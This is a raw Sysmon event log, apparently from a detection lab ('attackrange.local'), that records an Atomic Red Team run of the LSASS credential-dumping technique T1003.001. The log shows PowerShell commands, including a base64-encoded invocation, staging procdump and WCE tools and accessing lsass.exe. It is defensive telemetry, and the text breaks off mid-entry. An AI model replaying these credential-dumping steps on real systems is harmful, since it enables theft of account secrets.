15:52:47.995{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CD0-5FA1-D600-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004283Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:47.995{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD0-5FA1-D600-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004282Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.002{D28789B6-7CD0-5FA1-D600-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 11241100x80000000000000004342Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:49.952{D28789B6-7CD0-5FA1-D800-000000008801}2872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Procdump\procdump64a.exe2020-11-03 15:52:49.952 11241100x80000000000000004341Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:49.936{D28789B6-7CD0-5FA1-D800-000000008801}2872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Procdump\procdump64.exe2020-11-03 15:52:49.936 11241100x80000000000000004340Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:49.905{D28789B6-7CD0-5FA1-D800-000000008801}2872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Procdump\procdump.exe2020-11-03 15:52:49.905 22542200x80000000000000004339Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:47.296{D28789B6-7CCE-5FA1-D500-000000008801}2212www.ampliasecurity.com0type: 5 ampliasecurity.com;::ffff:155.133.130.34;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x80000000000000004338Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:47.015{D28789B6-7CCE-5FA1-D500-000000008801}2212raw.githubusercontent.com0type: 5 github.map.fastly.net;::ffff:151.101.112.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x80000000000000004398Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.722{D28789B6-7CD0-5FA1-D800-000000008801}2872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50342-false152.199.19.160-443https 10341000x80000000000000004397Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.531{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD2-5FA1-DB00-000000008801}2764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004396Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.531{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD2-5FA1-DB00-000000008801}2764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004395Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.499{D28789B6-7CD2-5FA1-DB00-000000008801}2764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rybpks3n.bp3.ps12020-11-03 15:52:50.499 10341000x80000000000000004394Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.484{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CD2-5FA1-DB00-000000008801}2764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004393Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.468{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD2-5FA1-DB00-000000008801}2764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004392Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.468{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD2-5FA1-DB00-000000008801}2764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004391Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.468{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004390Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.468{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004389Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.468{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004388Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.468{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004387Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.468{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004386Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.468{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004385Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.468{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004384Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.468{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004383Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.468{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004382Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.452{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CD2-5FA1-DB00-000000008801}2764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004381Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.452{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD2-5FA1-DB00-000000008801}2764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d